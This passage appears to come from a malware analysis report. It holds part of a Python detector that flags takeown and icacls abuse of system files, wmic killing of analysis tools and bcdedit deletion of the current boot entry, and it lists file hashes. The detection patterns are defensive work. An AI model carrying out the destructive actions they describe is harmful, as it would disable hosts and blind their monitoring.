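ACL_RE = re.compile(r'^(?:icacls|cacls)\s+"?(?P<path>[^"]+?)"?\s(?:.*\s)?'
                    r'/grant(?::r)?\s+"?(?:everyone|\*S-1-1-0)"?:(?:\([A-Z]+\))*F\b', re.I)
WMIC_KILL_RE = re.compile(r"^wmic\s+process\s+where\s+name='(?P<name>[^']+)'\s+delete\b", re.I)
BCD_RE = re.compile(r'^bcdedit\b.*?/(?P<verb>deletevalue|delete|set)\b', re.I)

PROTECTED_PREFIXES = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")
BOOT_CRITICAL = {"ntoskrnl.exe", "hal.dll", "winload.exe", "winload.efi", "winresume.exe", "bootmgr"}
# Names taken from the wmic/takeown targets in this report
SECURITY_TOOLS = {"taskmgr.exe", "perfmon.exe", "resmon.exe", "mmc.exe", "regedit.exe",
                  "procexp.exe", "procexp64.exe", "procexp64a.exe", "processhacker.exe",
                  "taskkill.exe", "tasklist.exe", "tskill.exe"}


def is_protected(path: str) -> bool:
    return path.lower().startswith(PROTECTED_PREFIXES)


def is_boot_critical(path: str) -> bool:
    p = path.lower()
    return p.rsplit("\\", 1)[-1] in BOOT_CRITICAL or "\\system32\\drivers" in p


def classify(event: dict) -> set:
    """Return the set of behaviour tags one process-creation event matches."""
    cmd = event["cmd"].strip()
    tags = set()
    if m := TAKEOWN_RE.match(cmd):
        if is_protected(m["path"]):
            tags.add("takeown_system_file")
        if is_boot_critical(m["path"]):
            tags.add("boot_critical_target")
    if m := ACL_RE.match(cmd):
        if is_protected(m["path"]):
            tags.add("everyone_full_control_on_system_file")
        if is_boot_critical(m["path"]):
            tags.add("boot_critical_target")
    if m := WMIC_KILL_RE.match(cmd):
        tags.add("wmic_process_delete")
        if m["name"].lower() in SECURITY_TOOLS:
            tags.add("kills_analysis_tool")
    if m := BCD_RE.match(cmd):
        tags.add("bcd_modified")
        if m["verb"].lower() == "delete" and "{current}" in cmd.lower():
            tags.add("deletes_current_boot_entry")
    return tags


def correlate(events: list, threshold: int = 3) -> dict:
    """Union the tags of all children per parent PID; report parents that reach
    `threshold` distinct behaviours. One takeown alone is admin noise; the cluster is not."""
    by_parent = defaultdict(set)
    for ev in events:
        by_parent[ev["ppid"]] |= classify(ev)
    return {ppid: sorted(tags) for ppid, tags in by_parent.items() if len(tags) >= threshold}


if __name__ == "__main__":
    for ppid, tags in correlate(SAMPLE_EVENTS).items():
        print(f"parent PID {ppid}: {', '.join(tags)}")
```

In production the per-parent union should be bounded by a time window and keyed on the process GUID rather than the PID, since this run alone reuses PIDs 2228, 1476, 4396, 4628 and 4832 for unrelated processes. The `deletes_current_boot_entry` and `boot_critical_target` tags deserve an immediate response on their own: once the active BCD entry is gone the host needs `bootrec /rebuildbcd` or `bcdboot` from recovery media, and a modified ntoskrnl.exe or hal.dll should be treated as a rebuild, not a repair.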
Network
MITRE ATT&CK Enterprise v15
Downloads (listed by size and hash; the report gives no file names)

Filesize: 2KB
  MD5    540628cd868694b35e78a2fcf3c64106
  SHA1   6dc3aae3f14f9fd333dadc0bac58b0751d3cf939
  SHA256 1f6ceaf20791c6c4522c1f95cc79df61b7b64feaf96d819176611bc3ad9c8386
  SHA512 e047ba3efc8b5c5962f8b113641207ea8de4b8e0ca09db0e7f1941fbd99169c7cc6e32eef0433552b6334c19568bdb7666e530d4cb44a425ad2757969b702a37

Filesize: 1KB
  MD5    3317a33cfc29c6ccd4b3d4e94e887b83
  SHA1   8bcc561db8233af2e53aa0548bd532c37582b3e8
  SHA256 818db7a461050a56d683cd331832cb3d7ea6a8260daaf175b7ee3934b5bf89ad
  SHA512 d57b8e47c5a38a8585a82bc1114de35cf255c33d9c87b72f5eb065f4afc3ca40ca27c558890cc3d84ddaadd756c66ca7f820867a95358d12aaf1ede869002576

Filesize: 1KB
  MD5    015a2f88c69d91d7e87ee412f7def503
  SHA1   d7a84f1a0a4c97d0d67a55b82572ed256053dffb
  SHA256 c6fa726a4a259b764f77ba44940ed5ee3c244c3b3909a9638dff848420ca31e6
  SHA512 65c019ea42873787e0a646ec6b3378f3f532266471208525caa120c6cf414fc6841c1ca11ec5939141a1f9b6d91ff9cc5370d3dcfe398519add9fd602ff0313d

Filesize: 1KB
  MD5    323b17a21bfad9d01e2c03e58b513b0d
  SHA1   7ca1b21a9591a011f048aa4e6092a61e5e70c1e7
  SHA256 0dceda91d69e537d9a956e8774e1d427e680ee2b977725740a38dd484bbc539a
  SHA512 91f2428baea9fa428fb09f04697a8332866570a96f5043bb39ece723a3650ff11b280194b9ee9f56db076336fdf5adc066ec802dbd95be7981a99bc7831aef30

Filesize: 1KB
  MD5    4bb8e80ea32fe402db660aadca80bc32
  SHA1   4d24b3f399d60cc47e1a9bb0ef148617ae2112ee
  SHA256 34aa7b0a90077bff594711813f76ca10566d3c150019b246da43e2f6f245e155
  SHA512 d96240298969f5fbf9fdac06b851f5e3465427e1bb25f1a83c434f572f2bca6a097820f6ce27dc009b2919cb94f7f1525f810325d45df31709f2762925c580b3

Filesize: 1KB
  MD5    7e9669d4b64d08125fee6f323e12d8d0
  SHA1   0426d4ebc4d5b0664e3de4753abb070ec7f5fa8a
  SHA256 fa6d98ca7c3a3f89e921b23d4493210fe6755a1f8db913fe1109cc6b2e33cb80
  SHA512 8ac0090e79f769f3ae5c65a42a882e4e59458e42dea9eea09b47e237599177eb6ff8863d47ee1d7102784661537636f79d90b25834a9d62d49b3668a84116634

Filesize: 1KB
  MD5    ef199f83a2490dfd03ac845750e8aa29
  SHA1   59ef459ed8c94e1da5662ae692876ef3026739b9
  SHA256 22b1702f808d989aeb889c39dedb3431d7da8fcc057aafd6d6699a5645010f5d
  SHA512 9b6c6f625744cd9565f582c465c63bef45674a6bb66b502c9eb60b2a06ca0e9538a644800249bbf218511ce4284e4ba64a63091d299873b7c58a9f999155c72c

Filesize: 6KB
  MD5    85cf1f3b6f9d4428301cb7f0802b3adf
  SHA1   4ca5d619e7932463567a17864e29ac3788fe85dc
  SHA256 5e9db9e4a9c4eb22a63a6021c890ae843f85dc0e54e5300e33f63564aaa60e03
  SHA512 152f7f07c2a434aff729cee58a7c135a8d9b6c7a4a4334d51d5aa738617b87833ae0b79b87cefd8d4c6ab428d3cac00d46cf9c4d9c029acd8f07205b85cda074

Filesize: 6KB
  MD5    dd0b1bb28a2fadfbf252340f51b50087
  SHA1   9c46f0b0947e600470baca4d07e59876d102055f
  SHA256 0be3fd6c96c128a71c1275329f47e44fed338bcb0627f063f4fca1cdab8add21
  SHA512 f90ccf70461cab01c0e0547bdae8eeb43051f87f7e7850a5c7dcf94b36ae0be295b18cd45c82c23acef23803232711180e062f61c009658685f4b78dfe31a466

Filesize: 6KB
  MD5    4d548231eb768ecd9131f64d09a5f484
  SHA1   0cefa9b3b714d9a69d8d823e4055b6910c504380
  SHA256 6099be65f020332b34a45b52f34ad086db20d6f95ec690db93d4b5c5c68f6ee3
  SHA512 b6ef58d2d4375e0df55b49165cc19fec267deec221058b8b8c9485957a65380e2558f9e49e54fb4d3cf2ca59c9443ae9e09e67d330455cca121551c1b2d424f7

Filesize: 136KB
  MD5    626b64b810b25479669c363bae353195
  SHA1   cd2bd5040118a9018218449d7f60e115623fab81
  SHA256 234e3c52da389cfb14a0b3cdf45811f691e8d74f39d38645b043c8e4f11141be
  SHA512 d7f5f02533cc271bfdfd89a6cdbb469a38ece09c66c6ae279d610eac04d064f2a94d9a4e0925804875417ba906ccbbdf23af806288a50f982175a64eb465ef12

Filesize: 2B (these are the hashes of the two-byte string "{}", an empty JSON object)
  MD5    99914b932bd37a50b983c5e7c90ae93b
  SHA1   bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
  SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
  SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Filesize: 5KB
  MD5    a645734f3bf4a2682cbaf546789ec0c4
  SHA1   fafcc11909412bf51f217e12dfaa93a15181a3e2
  SHA256 3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
  SHA512 efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d

Filesize: 87KB
  MD5    aba9a3cf4e1db4602c25405987b809a6
  SHA1   6cd545ea023ce9cdfe76607c6801cc11ff7d9e80
  SHA256 490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
  SHA512 e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

Filesize: 247KB
  MD5    733eb0ab951ae42a8d8cca413201e428
  SHA1   640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
  SHA256 52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
  SHA512 c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f

Filesize: 139KB
  MD5    11d457ee914f72a436fa4a8a8f8446dd
  SHA1   d0308ca82ed9716b667e8e77e9ae013b9af44116
  SHA256 c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
  SHA512 4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b